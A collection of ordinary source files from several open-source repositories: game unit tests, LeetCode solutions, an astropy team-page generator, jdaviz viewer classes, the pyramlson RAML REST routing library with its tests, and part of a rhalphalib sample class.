assert goal_0.score(board) == 5
goal_1 = BlobGoal(COLOUR_LIST[1])
assert goal_1.score(board) == 1
goal_2 = BlobGoal(COLOUR_LIST[2])
assert goal_2.score(board) == 1
goal_3 = BlobGoal(COLOUR_LIST[3])
assert goal_3.score(board) == 4
def test_blob_44() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board, colours)
goal_0 = BlobGoal(COLOUR_LIST[0])
assert goal_0.score(board) == 4
goal_1 = BlobGoal(COLOUR_LIST[1])
assert goal_1.score(board) == 0
goal_2 = BlobGoal(COLOUR_LIST[2])
assert goal_2.score(board) == 4
goal_3 = BlobGoal(COLOUR_LIST[3])
assert goal_3.score(board) == 4
def test_blob_45() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours = [COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[3]]
set_children(board, colours)
goal_0 = BlobGoal(COLOUR_LIST[0])
assert goal_0.score(board) == 16
goal_1 = BlobGoal(COLOUR_LIST[1])
assert goal_1.score(board) == 0
goal_2 = BlobGoal(COLOUR_LIST[2])
assert goal_2.score(board) == 32
goal_3 = BlobGoal(COLOUR_LIST[3])
assert goal_3.score(board) == 16
def test_blob_46() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 4)
# Level 1
colours = [None, None, None, None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[0], COLOUR_LIST[0], None, COLOUR_LIST[3]]
set_children(board.children[0], colours1)
colours_5 = [None, COLOUR_LIST[2], COLOUR_LIST[2], None]
set_children(board.children[1], colours_5)
colours_6 = [None, None, COLOUR_LIST[1], None]
set_children(board.children[2], colours_6)
colours_7 = [None, None, COLOUR_LIST[1], None]
set_children(board.children[3], colours_7)
# Level 3
colours3 = [COLOUR_LIST[2], COLOUR_LIST[0], None, COLOUR_LIST[3]]
set_children(board.children[0].children[2], colours3)
colours_8 = [COLOUR_LIST[0], COLOUR_LIST[2], COLOUR_LIST[3], COLOUR_LIST[1]]
set_children(board.children[1].children[0], colours_8)
colours_9 = [None, COLOUR_LIST[2], COLOUR_LIST[3], COLOUR_LIST[1]]
set_children(board.children[1].children[3], colours_9)
colours_10 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board.children[2].children[0], colours_10)
colours_11 = [COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[0]]
set_children(board.children[2].children[1], colours_11)
colours_12 = [COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[2].children[3], colours_12)
colours_13 = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[3]]
set_children(board.children[3].children[0], colours_13)
colours_14 = [COLOUR_LIST[3], None, COLOUR_LIST[1], COLOUR_LIST[0]]
set_children(board.children[3].children[1], colours_14)
colours_15 = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board.children[3].children[3], colours_15)
#level 4
colours4 = [COLOUR_LIST[3], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[0]]
set_children(board.children[0].children[2].children[2], colours4)
colours_16 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1]]
set_children(board.children[1].children[3].children[0], colours_16)
colours_17 = [COLOUR_LIST[0], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board.children[3].children[1].children[1], colours_17)
goal_0 = BlobGoal(COLOUR_LIST[0])
assert goal_0.score(board) == 44
goal_1 = BlobGoal(COLOUR_LIST[1])
assert goal_1.score(board) == 40
goal_2 = BlobGoal(COLOUR_LIST[2])
assert goal_2.score(board) == 49
goal_3 = BlobGoal(COLOUR_LIST[3])
assert goal_3.score(board) == 42
# TODO: ~~~~~~ TASK 8 ~~~~~~ ~~~~~~ TASK 8 ~~~~~~ ~~~~~~ TASK 8 ~~~~~~
def test_create_player_47() -> None:
a = create_players(3, 2, [1, 3, 2])
assert len(a) == 8
assert a[0].id == 0
assert a[4].id == 4
assert a[7].id == 7
assert isinstance(a[1], HumanPlayer)
assert isinstance(a[2], HumanPlayer)
assert isinstance(a[3], RandomPlayer)
assert isinstance(a[5], SmartPlayer)
assert isinstance(a[7], SmartPlayer)
def test_create_player_48() -> None:
a = create_players(0, 0, [])
assert len(a) == 0
def test_create_player_49() -> None:
a = create_players(9, 10, [])
assert len(a) == 19
assert a[4].id == 4
assert isinstance(a[4], HumanPlayer)
assert isinstance(a[8], HumanPlayer)
assert isinstance(a[9], RandomPlayer)
if __name__ == '__main__':
pytest.main(['unit_test.py'])
```
|
{
"source": "jenndryden/coding-challenges",
"score": 3
}
|
#### File: coding-challenges/171-excel-sheet-column-number/171-excel-sheet-column-number.py
```python
class Solution:
def titleToNumber(self, columnTitle: str) -> int:
multiplier = 1
output = 0
for i in range(len(columnTitle)-1,-1,-1):
output += (ord(columnTitle[i])-64) * multiplier
multiplier *= 26
return output
```
#### File: coding-challenges/202-happy-number/202-happy-number.py
```python
class Solution:
def isHappy(self, n: int) -> bool:
seen = {}
while True:
if n in seen:
break
counter = 0
for i in range(len(str(n))):
counter += int(str(n)[i]) ** 2
seen[n] = 1
n = counter
counter = 0
if n == 1:
return True
break
else:
continue
return False
```
#### File: coding-challenges/35-search-insert-position/35-search-insert-position.py
```python
class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
start = 0
end = len(nums) - 1
while start <= end:
middle = (start + end) // 2
if nums[middle] == target:
return middle
if nums[middle]>target:
end = middle - 1
else:
start = middle + 1
return start
```
#### File: coding-challenges/53-maximum-subarray/53-maximum-subarray.py
```python
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
curr_sum = 0
max_sum = nums[0]
for n in nums:
if curr_sum < 0:
curr_sum = 0
curr_sum += n
max_sum = max(max_sum, curr_sum)
return max_sum
```
#### File: coding-challenges/56-merge-intervals/56-merge-intervals.py
```python
class Solution:
def merge(self, intervals: List[List[int]]) -> List[List[int]]:
intervals.sort(key=lambda x: x[0])
final = []
curr_start = intervals[0][0]
curr_end = intervals[0][1]
for interval in intervals:
if interval[0] <= curr_end:
curr_end = max(interval[1], curr_end)
else:
final.append([curr_start, curr_end])
curr_start = interval[0]
curr_end = interval[1]
final.append([curr_start, curr_end])
return final
```
#### File: coding-challenges/94-binary-tree-inorder-traversal/94-binary-tree-inorder-traversal.py
```python
class Solution:
def inorderTraversal(self, root: Optional[TreeNode]) -> List[int]:
numbers = []
def helper(node):
if node:
helper(node.left)
numbers.append(node.val)
helper(node.right)
return numbers
helper(root)
return numbers
```
|
{
"source": "Jenneh/astropy.github.com",
"score": 3
}
|
#### File: Jenneh/astropy.github.com/getteam.py
```python
from __future__ import print_function
def get_astropy_credits(warner=print):
"""
Looks for the ``credits.rst`` file in the astropy repo and returns it, or
returns False if the repo can't be found.
"""
import os
from urllib.request import urlopen
creditspath = os.environ.get('ASTROPY_REPO_PATH', 'http://raw.github.com/astropy/astropy/main/docs/credits.rst')
if creditspath.startswith('http'):
#url - download page from web
u = None
try:
u = urlopen(creditspath)
return u.read()
except Exception as e:
warner('Could not download credits.rst from requested path: "{0}" Using placeholder for "The Team" page.'.format(e))
return False
finally:
if u is not None:
u.close()
else:
if not os.path.isfile(creditspath):
warner('Credits.rst file at "{0}" is not a file! Using placeholder for "The Team" page.'.format(creditspath))
return False
with open(creditspath) as f:
return f.read()
def extract_names_list(docs, sectionname, warner=print):
from docutils import nodes
from docutils.core import publish_doctree
if not isinstance(docs, nodes.document):
docs = publish_doctree(docs)
assert isinstance(docs, nodes.document)
foundsections = []
for c in docs.children:
titleidx = c.first_child_matching_class(nodes.title)
if titleidx is not None:
title = str(c.children[titleidx].children[0])
if title == sectionname:
section = c
break
else:
foundsections.append(title)
else:
warner("No section found with name {0}. Sections are:{1!s}".format(sectionname, foundsections))
return None
listidx = section.first_child_matching_class(nodes.bullet_list)
litems = section.children[listidx].children
names = []
for litem in litems:
names.append(''.join(litem.traverse(lambda n: isinstance(n, nodes.Text))))
return names
def process_html(fn, newcoordinators, newcontributors, indent='\t\t\t'):
"""
Returns a string of html mean to look like the input, but with content from
the credits file.
"""
lines = []
incoord = incontrib = False
with open(fn) as fr:
for l in fr:
if l.endswith('\n'):
l = l[:-1] # strip newline
if incoord:
if '</ul>' in l:
lines.extend([(indent + '<li>' + c + '</li>') for c in newcoordinators])
lines.append(l)
incoord = False
#skip otherwise
elif incontrib:
if '</ul>' in l:
lines.extend([(indent + '<li>' + c + '</li>') for c in newcontributors])
lines.append(l)
incontrib = False
else:
if '<ul class="team">' in l:
lines.append(l)
#skip otherwise
else:
if '<ul class="coordinators">' in l:
incoord = True
elif '<h3 id="core-package-contributors">' in l:
incontrib = True
lines.append(l)
return '\n'.join(lines)
if __name__ == '__main__':
from docutils.core import publish_doctree
dt = publish_doctree(get_astropy_credits())
coordinators = extract_names_list(dt, 'Astropy Project Coordinators')
contributors = extract_names_list(dt, 'Core Package Contributors')
newhtml = process_html('team.html', coordinators, contributors)
print('Replacing "team.html" with updated version. Be sure to "git diff '
'team.html" before committing to ensure no funny business happened.')
with open('team.html', 'wb') as f:
f.write(newhtml.encode('UTF-8'))
```
|
{
"source": "Jenneh/jdaviz",
"score": 2
}
|
#### File: mosviz/plugins/viewers.py
```python
from glue.core import BaseData
from glue_jupyter.bqplot.image import BqplotImageView
from glue_jupyter.bqplot.profile import BqplotProfileView
from specutils import Spectrum1D
from jdaviz.core.registries import viewer_registry
__all__ = ['MOSVizProfileView', 'MOSVizImageView']
@viewer_registry("mosviz-profile-viewer", label="Profile 1D (MOSViz)")
class MOSVizProfileView(BqplotProfileView):
default_class = Spectrum1D
def data(self, cls=None):
return [layer_state.layer.get_object(cls=cls or self.default_class)
for layer_state in self.state.layers
if hasattr(layer_state, 'layer') and
isinstance(layer_state.layer, BaseData)]
@viewer_registry("mosviz-image-viewer", label="Image 2D (MOSViz)")
class MOSVizImageView(BqplotImageView):
default_class = None
def data(self, cls=None):
return [layer_state.layer #.get_object(cls=cls or self.default_class)
for layer_state in self.state.layers
if hasattr(layer_state, 'layer') and
isinstance(layer_state.layer, BaseData)]
```
#### File: configs/specviz/helper.py
```python
import pathlib
import uuid
import astropy.units as u
from specutils import Spectrum1D, SpectrumCollection, SpectralRegion
from jdaviz.core.helpers import ConfigHelper
class SpecViz(ConfigHelper):
"""SpecViz Helper class"""
_default_configuration = 'specviz'
def load_data(self, data, data_label=None, format=None):
"""
Loads a data file or `~specutils.Spectrum1D` object into SpecViz.
Parameters
----------
data : str or `~specutils.Spectrum1D`
Spectrum1D spectra, or path to compatible data file.
data_label : str
The Glue data label found in the ``DataCollection``.
format : str
Loader format specification used to indicate data format in
`~specutils.Spectrum1D.read` io method.
"""
# If no data label is assigned, give it a unique identifier
if data_label is None:
data_label = "specviz_data|" + uuid.uuid4().hex
# If data provided is a path, try opening into a Spectrum1D object
try:
path = pathlib.Path(data)
if path.is_file():
data = Spectrum1D.read(path, format=format)
else:
raise FileNotFoundError("No such file: " + path)
# If not, it must be a Spectrum1D object. Otherwise, it's unsupported
except TypeError:
if type(data) is SpectrumCollection:
raise TypeError("`SpectrumCollection` detected. Please "
"provide a `Spectrum1D`.")
elif type(data) is not Spectrum1D:
raise TypeError("Data is not a Spectrum1D object or compatible file")
self.app.add_data(data, data_label)
self.app.add_data_to_viewer('spectrum-viewer', data_label)
def get_spectra(self):
"""Returns the current data loaded into the main viewer"""
return self.app.get_data_from_viewer('spectrum-viewer')
def get_spectral_regions(self):
"""
Retrieves glue subset objects from the spectrum viewer and converts
them to `~specutils.SpectralRegion` objects.
Returns
-------
spec_regs : dict
Mapping from the names of the subsets to the subsets expressed
as `specutils.SpectralRegion` objects.
"""
regions = self.app.get_subsets_from_viewer('spectrum-viewer')
spec_regs = {}
for name, reg in regions.items():
unit = reg.meta.get('spectral_axis_unit', u.Unit('Angstrom'))
spec_reg = SpectralRegion.from_center(reg.center.x * unit,
reg.width * unit)
spec_regs[name] = spec_reg
return spec_regs
```
#### File: specviz/plugins/viewers.py
```python
from glue.core import BaseData
from glue_jupyter.bqplot.profile import BqplotProfileView
from specutils import Spectrum1D
from jdaviz.core.registries import viewer_registry
__all__ = ['SpecvizProfileView']
@viewer_registry("specviz-profile-viewer", label="Profile 1D (Specviz)")
class SpecvizProfileView(BqplotProfileView):
default_class = Spectrum1D
def data(self, cls=None):
return [layer_state.layer.get_object(cls=cls or self.default_class)
for layer_state in self.state.layers
if hasattr(layer_state, 'layer') and
isinstance(layer_state.layer, BaseData)]
```
#### File: jdaviz/jdaviz/utils.py
```python
import os
from traitlets import Unicode
__all__ = ['load_template']
def load_template(file_name, path=None, traitlet=True):
"""
Load a vue template file and instantiate the appropriate traitlet object.
Parameters
----------
file_name : str
The name of the template file.
root_path : str
The path to where the template file is stored. If none is given,
assumes the directory where the python file calling this function
resides.
Returns
-------
`Unicode`
The traitlet object used to hold the vue code.
"""
path = os.path.dirname(path)
with open(os.path.join(path, file_name)) as f:
TEMPLATE = f.read()
if traitlet:
return Unicode(TEMPLATE)
return TEMPLATE
```
|
{
"source": "jenner/pyramlson",
"score": 2
}
|
#### File: pyramlson/pyramlson/__init__.py
```python
import re
import os
import logging
from email.utils import parsedate
from inspect import getmembers
from collections import namedtuple, defaultdict
import venusian
from pyramid.path import (
AssetResolver,
DottedNameResolver
)
from pyramid.httpexceptions import (
HTTPBadRequest,
HTTPInternalServerError,
HTTPNoContent,
)
from pyramid.interfaces import IExceptionResponse
from pyramid.settings import asbool
from .apidef import IRamlApiDefinition
from .utils import (
prepare_json_body,
render_mime_view,
render_view,
validate_and_convert
)
LOG = logging.getLogger(__name__)
DEFAULT_METHOD_MAP = {
'get': 200,
'post': 200,
'put': 201,
'delete': 204,
'options': 200,
'patch': 200,
}
MethodRestConfig = namedtuple('MethodRestConfig', [
'http_method',
'permission',
'returns'
])
MARKER = object()
class NoMethodFoundError(Exception):
""" Raised when no matching method(s) for a service could be found """
class api_method(object):
# pylint: disable=invalid-name
def __init__(self, http_method, permission=None, returns=None):
"""Configure a resource method corresponding with a RAML resource path
This decorator must be used to declare REST resources.
:param http_method: The HTTP method this method maps to.
:param permission: Permission for this method.
:param returns: A custom HTTP code to return in case of success.
Configure the HTTP code to return when the method call was successful.
Per default the codes are expected to match the configured HTTP method:
- GET/POST/PATCH: 200
- PUT: 201
- DELETE: 204
"""
self.http_method = http_method
self.permission = permission
self.returns = returns if returns is not None else DEFAULT_METHOD_MAP[self.http_method]
def __call__(self, method):
method._rest_config = MethodRestConfig(
self.http_method,
self.permission,
self.returns
)
return method
class api_service(object):
"""Configures a resource by its REST path.
This decorator configures a class as a REST resource. All endpoints
must be defined in a RAML file.
"""
# pylint: disable=invalid-name
def __init__(self, resource_path, route_name=None):
LOG.debug("Resource path: %s", resource_path)
self.resource_path = resource_path
self.route_name = route_name
self.resources = []
self.apidef = None
self.cls = None
self.module = None
def callback(self, scanner, name, cls):
config = scanner.config.with_package(self.module)
self.apidef = config.registry.queryUtility(IRamlApiDefinition)
self.create_route(config)
LOG.debug("registered routes with base route '%s'", self.apidef.base_path)
self.create_views(config)
def create_route(self, config):
LOG.debug("Creating route for %s", self.resource_path)
supported_methods = []
path = self.resource_path
if self.apidef.base_path:
path = "{}{}".format(self.apidef.base_path, path)
# Find all methods for this resource path
for resource in self.apidef.get_resources(self.resource_path):
if self.route_name is None:
self.route_name = "{}-{}".format(resource.display_name, path)
method = resource.method.upper()
self.resources.append((method, resource, None))
supported_methods.append(method)
# Add one route for all the methods at this resource path
if supported_methods:
LOG.debug("Registering route with path %s", path)
config.add_route(self.route_name, path, factory=self.cls)
# add a default OPTIONS view if none was defined by the resource
opts_meth = 'OPTIONS'
if opts_meth not in supported_methods:
methods = supported_methods + [opts_meth]
self.resources.append((
'OPTIONS',
resource,
create_options_view(methods)
))
def create_views(self, config):
for (method, resource, default_view) in self.resources:
LOG.debug("Creating view %s %s", self.route_name, method)
if default_view:
config.add_view(
default_view,
route_name=self.route_name,
request_method=method
)
else:
(view, permission) = self.create_view(resource)
LOG.debug(
"Registering view %s for route name '%s', resource '%s', method '%s'",
view,
self.route_name,
resource,
method
)
config.add_view(
view,
route_name=self.route_name,
request_method=method,
permission=permission
)
def __call__(self, cls):
self.cls = cls
info = venusian.attach(cls, self.callback, 'pyramid', depth=1)
self.module = info.module
return cls
def create_view(self, resource):
(meth, cfg) = self.get_service_class_method(resource)
LOG.debug("Got method %s for resource %s", meth, resource)
if not meth:
msg = "Could not find a method in class {} suitable for resource {}.".format(
self.cls,
resource
)
raise NoMethodFoundError(msg)
transform = self.apidef.args_transform_cb
transform = transform if callable(transform) else lambda arg: arg
convert = self.apidef.convert_params
def view(context, request):
required_params = [context]
optional_params = dict()
# URI parameters have the highest prio
if resource.uri_params:
for param in resource.uri_params:
param_value = request.matchdict[param.name]
converted = validate_and_convert(param, param_value)
# pyramid router makes sure the URI params are all
# set, otherwise the view isn't called all, because
# a NotFound error is triggered before the request
# can be routed to this view
required_params.append(converted if convert else param_value)
# If there's a body defined - include it before traits or query params
if resource.body:
if resource.body[0].mime_type == "application/json":
required_params.append(prepare_json_body(request, resource.body))
else:
required_params.append(request.body)
if resource.query_params:
for param in resource.query_params:
# query params are always named (i.e. not positional)
# so they effectively become keyword agruments in a
# method call, we just make sure they are present
# in the request if marked as 'required'
if param.required and param.name not in request.params:
raise HTTPBadRequest("{} ({}) is required".format(param.name, param.type))
param_value = request.params.get(param.name, MARKER)
absent = param_value is MARKER
# If there's no default value defined in RAML let the decorated
# method decide which defaults to use. Unfortunatelly there is
# no way to tell whether a default value was declared as 'null'
# in RAML or if it was omitted - it's None in both cases
if absent and param.default is None:
continue
if not absent:
if convert:
param_value = validate_and_convert(param, param_value)
else:
if convert:
param_value = validate_and_convert(param, param.default)
else:
param_value = param.default
optional_params[transform(param.name)] = param_value
result = meth(*required_params, **optional_params)
# check if a response type is specified
for response in resource.responses:
if response.code == cfg.returns and len(response.body) == 1:
body = response.body[0]
if body.mime_type == 'application/json':
break
response_mime_type = body.mime_type
return render_mime_view(result, cfg.returns, mime_type=response_mime_type)
return render_view(request, result, cfg.returns)
return (view, cfg.permission)
def get_service_class_method(self, resource):
rel_path = resource.path[len(self.resource_path):]
LOG.debug("Relative path for %s: '%s'", resource, rel_path)
http_method = resource.method.lower()
for (_, member) in getmembers(self.cls):
if not hasattr(member, '_rest_config'):
continue
cfg = member._rest_config # pylint: disable=protected-access
if (cfg.http_method.lower() == http_method) and callable(member):
return (member, cfg)
return (None, None)
def create_options_view(supported_methods):
""" Create a view callable for the OPTIONS request """
def view(context, request): # pylint: disable=unused-argument,missing-docstring
response = HTTPNoContent()
response.headers['Access-Control-Allow-Methods'] =\
', '.join(supported_methods)
return response
return view
def includeme(config):
"""Configure basic RAML REST settings for a Pyramid application.
You should not call this function directly, but use
:py:func:`pyramid.config.Configurator.include` to initialise
the RAML routing.
.. code-block:: python
:linenos:
config = Configurator()
config.include('pyramlson')
"""
from pyramlson.apidef import RamlApiDefinition
settings = config.registry.settings
settings['pyramlson.debug'] = \
settings.get('debug_all') or \
settings.get('pyramid.debug_all') or \
settings.get('pyramlson.debug')
config.add_view('pyramlson.error.generic', context=Exception, renderer='json')
config.add_view('pyramlson.error.http_error', context=IExceptionResponse, renderer='json')
config.add_notfound_view('pyramlson.error.notfound', renderer='json')
config.add_forbidden_view('pyramlson.error.forbidden', renderer='json')
if 'pyramlson.apidef_path' not in settings:
raise ValueError("Cannot create RamlApiDefinition without a RAML file.")
args_transform_cb = None
if 'pyramlson.arguments_transformation_callback' in settings:
args_transform_cb = DottedNameResolver().maybe_resolve(
settings['pyramlson.arguments_transformation_callback']
)
convert_params = False
if 'pyramlson.convert_parameters' in settings:
convert_params = asbool(settings['pyramlson.convert_parameters'])
res = AssetResolver()
apidef_path = res.resolve(settings['pyramlson.apidef_path'])
apidef = RamlApiDefinition(
apidef_path.abspath(),
args_transform_cb=args_transform_cb,
convert_params=convert_params
)
config.registry.registerUtility(apidef, IRamlApiDefinition)
```
#### File: pyramlson/tests/bad_resource.py
```python
from pyramlson import api_service, api_method
@api_service('/books')
class BadResource(object):
def __init__(self, request):
self.request = request
```
#### File: pyramlson/tests/test_resource.py
```python
import os
import unittest
import inflection
from email.utils import parsedate
from datetime import datetime
from pyramid import testing
from six import text_type
from pyramid.config import Configurator
from .base import DATA_DIR
from .resource import BOOKS
from pyramlson import NoMethodFoundError
class ResourceFunctionalTests(unittest.TestCase):
def setUp(self):
settings = {
'pyramlson.apidef_path': os.path.join(DATA_DIR, 'test-api.raml'),
'pyramlson.debug': 'true',
'pyramlson.arguments_transformation_callback': inflection.underscore,
'pyramlson.convert_parameters': 'false'
}
self.config = testing.setUp(settings=settings)
self.config.include('pyramlson')
self.config.scan('.resource')
from webtest import TestApp
self.testapp = TestApp(self.config.make_wsgi_app())
def tearDown(self):
testing.tearDown()
def test_get_list_json(self):
r = self.testapp.get('/api/v1/books', status=200)
assert r.json_body == list(BOOKS.values())
def test_get_one(self):
app = self.testapp
r = app.get('/api/v1/books/123', status=200)
assert r.json_body == BOOKS[123]
r = app.get('/api/v1/books/456', status=200)
assert r.json_body == BOOKS[456]
def test_get_notfound(self):
app = self.testapp
r = app.get('/api/v1/books/111', status=404)
assert r.json_body['success'] == False
assert r.json_body['message'] == "Book with id 111 could not be found."
book_id = 10
fake_book = {'id': book_id, 'title': 'Foo', 'author': 'Blah'}
r = app.put_json('/api/v1/books/{}'.format(book_id), params=fake_book, status=404)
assert r.json_body['success'] == False
assert r.json_body['message'] == "Book with id {} could not be found.".format(book_id)
def test_get_general_error(self):
app = self.testapp
r = app.get('/api/v1/books/zzz', status=400)
assert r.json_body['success'] == False
assert "Malformed parameter 'bookId'" in r.json_body['message']
def test_json_validation_error(self):
app = self.testapp
r = app.put('/api/v1/books/111', status=400)
assert r.json_body['message'] == "Empty body!"
assert r.json_body['success'] == False
r = app.request('/api/v1/books/111',
method='PUT',
body=b'{',
status=400,
content_type='application/json')
assert r.json_body['success'] == False
assert str(r.json_body['message']).startswith("Invalid JSON body:")
book_id = 10
fake_book = {'author': 'Blah'}
r = app.put_json('/api/v1/books/{}'.format(book_id), params=fake_book, status=400)
assert r.json_body['success'] == False
assert 'Failed validating' in r.json_body['message']
def test_not_accepted_body_mime_type(self):
app = self.testapp
r = app.request('/api/v1/books/123',
method='PUT',
body=b'hi there',
status=400,
content_type='text/plain')
assert r.json_body['success'] == False
assert "Invalid JSON body:" in r.json_body['message']
def test_succesful_json_put(self):
app = self.testapp
book_id = 123
fake_book = {'id': book_id, 'title': 'Foo', 'author': 'Blah'}
r = app.put_json('/api/v1/books/{}'.format(book_id), params=fake_book, status=200)
assert r.json_body['success'] == True
def test_default_options(self):
app = self.testapp
r = app.options('/api/v1/books', status=204)
header = r.headers['Access-Control-Allow-Methods'].split(', ')
assert 'POST' in header
assert 'GET' in header
assert 'OPTIONS' in header
def test_required_uriparams(self):
app = self.testapp
tt = 'a'
r = app.get('/api/v1/books/some/other/things', params=dict(thingType=tt), status=200)
# note the renamed argument
assert r.json_body['thing_type'] == tt
def test_missing_required_uriparams(self):
app = self.testapp
tt = 'a'
r = app.get('/api/v1/books/some/other/things', params=dict(foo='bar'), status=400)
assert r.json_body['message'] == 'thingType (string) is required'
def test_post_file(self):
file_id = 'foo'
file_content = b'foobar'
uri = '/api/v1/files/{}'.format(file_id)
r = self.testapp.post(
uri,
file_content,
content_type='application/octet-stream',
status=201
)
r2 = self.testapp.get('/api/v1/files/{}'.format(file_id), status=200)
assert r2.body == file_content
class NoMatchingResourceMethodTests(unittest.TestCase):
def setUp(self):
settings = {
'pyramlson.apidef_path': os.path.join(DATA_DIR, 'test-api.raml'),
}
self.config = testing.setUp(settings=settings)
def test_valueerror(self):
self.config.include('pyramlson')
self.assertRaises(NoMethodFoundError, self.config.scan, '.bad_resource')
def datetime_adapter(obj, request):
return obj.isoformat()
class ParamsConverterTests(unittest.TestCase):
def setUp(self):
from pyramid.renderers import JSON
json_renderer = JSON()
settings = {
'pyramlson.apidef_path': os.path.join(DATA_DIR, 'test-api.raml'),
'pyramlson.debug': 'true',
'pyramlson.arguments_transformation_callback': inflection.underscore,
'pyramlson.convert_parameters': 'true'
}
self.config = testing.setUp(settings=settings)
self.config.include('pyramlson')
json_renderer.add_adapter(datetime, datetime_adapter)
self.config.add_renderer('json', json_renderer)
self.config.scan('.resource')
from webtest import TestApp
self.testapp = TestApp(self.config.make_wsgi_app())
def test_param_type_conversion(self):
date_str = 'Sun, 06 Nov 1994 08:49:37 GMT'
date = datetime(*parsedate(date_str)[:6])
params = {
'maxString': 'zzz',
'minString': 'tt',
'choiceString': 'bar',
'patternString': 'ABCD54321',
'someNumber': '7',
'minMaxNumber': '0.8',
'minMaxInteger': '20',
'someBool': 'true',
'someDate': date_str
}
r = self.testapp.get('/api/v1/parametrized', params=params)
b = r.json_body
assert type(b['max_string']) is text_type
assert type(b['min_string']) is text_type
assert type(b['choice_string']) is text_type
assert type(b['pattern_string']) is text_type
assert type(b['some_number']) is int
assert type(b['min_max_number']) is float
assert type(b['min_max_integer']) is int
assert type(b['some_bool']) is bool
assert b['some_date'] == datetime_adapter(date, None)
def test_string_param_validation(self):
params = {
'maxString': 'z' * 20,
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert "Malformed parameter 'maxString'" in r.json_body['message']
assert "expected maximum length is 10, got 20" in r.json_body['message']
params = {
'minString': 'z'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Malformed parameter 'minString', expected minimum length is 2, got 1"
params = {
'choiceString': 'biteme'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Malformed parameter 'choiceString', expected one of foo, bar, blah, got 'biteme'"
params = {
'patternString': 'biteme'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Malformed parameter 'patternString', expected pattern ^[A-Z]{4}[0-9]*$, got 'biteme'"
def test_number_param_validation(self):
params = {
'someNumber': 'Rasdf'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Malformed parameter 'someNumber', expected a syntactically valid number, got 'Rasdf'"
params = {
'minMaxNumber': '-400.456'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Parameter 'minMaxNumber' is too small, expected at least -10, got -400.456"
params = {
'minMaxNumber': '800.800'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Parameter 'minMaxNumber' is too large, expected at most 100.55, got 800.8"
def test_integer_param_validation(self):
params = {
'minMaxInteger': '4.08'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Malformed parameter 'minMaxInteger', expected a syntactically valid integer, got '4.08'"
params = {
'minMaxInteger': '0'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Parameter 'minMaxInteger' is too small, expected at least 7, got 0"
params = {
'minMaxInteger': '100'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Parameter 'minMaxInteger' is too large, expected at most 42, got 100"
def test_bool_param_validation(self):
params = {
'someBool': 'yes'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert "Malformed boolean parameter 'someBool'" in r.json_body['message']
assert "expected 'true' or 'false', got 'yes'" in r.json_body['message']
def test_date_param_validation(self):
params = {
'someDate': '2016-1-11'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert "Malformed parameter 'someDate'" in r.json_body['message']
assert "expected RFC 2616 formatted date, got 2016-1-11" in r.json_body['message']
date_str = 'Sun, 06 Nov 1000 53:78:37'
params = {
'someDate': date_str
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert "Malformed parameter 'someDate':" in r.json_body['message']
assert "hour must be in 0..23" in r.json_body['message']
def test_missing_default_in_raml(self):
r = self.testapp.get('/api/v1/parametrized', status=200)
assert "defined in method!" == r.json_body['missing_default']
```
|
{
"source": "jennetd/rhalphalib",
"score": 2
}
|
#### File: rhalphalib/rhalphalib/sample.py
```python
from __future__ import division
import numpy as np
import numbers
import warnings
from .parameter import (
Parameter,
IndependentParameter,
NuisanceParameter,
DependentParameter,
SmoothStep,
Observable,
)
from .util import _to_numpy, _to_TH1, _pairwise_sum, install_roofit_helpers
class Sample(object):
"""
Sample base class
"""
SIGNAL, BACKGROUND = range(2)
def __init__(self, name, sampletype):
self._name = name
self._sampletype = sampletype
self._observable = None
self._mask = None
def __repr__(self):
return "<%s (%s) instance at 0x%x>" % (
self.__class__.__name__,
self._name,
id(self),
)
@property
def name(self):
return self._name
@property
def sampletype(self):
return self._sampletype
@property
def observable(self):
if self._observable is None:
raise RuntimeError("A Sample was not constructed correctly")
return self._observable
@observable.setter
def observable(self, obs):
# TODO check compatible?
self._observable = obs
@property
def parameters(self):
raise NotImplementedError
@property
def mask(self):
'''
An array matching the observable binning that specifies which bins to populate
i.e. when mask[i] is False, the bin content will be set to 0.
'''
return self._mask
@mask.setter
def mask(self, mask):
if isinstance(mask, np.ndarray):
mask = mask.astype(bool)
if self.observable.nbins != len(mask):
raise ValueError("Mask shape does not match number of bins in observable")
# protect from mutation
mask.setflags(write=False)
elif mask is not None:
raise ValueError("Mask should be None or a numpy array")
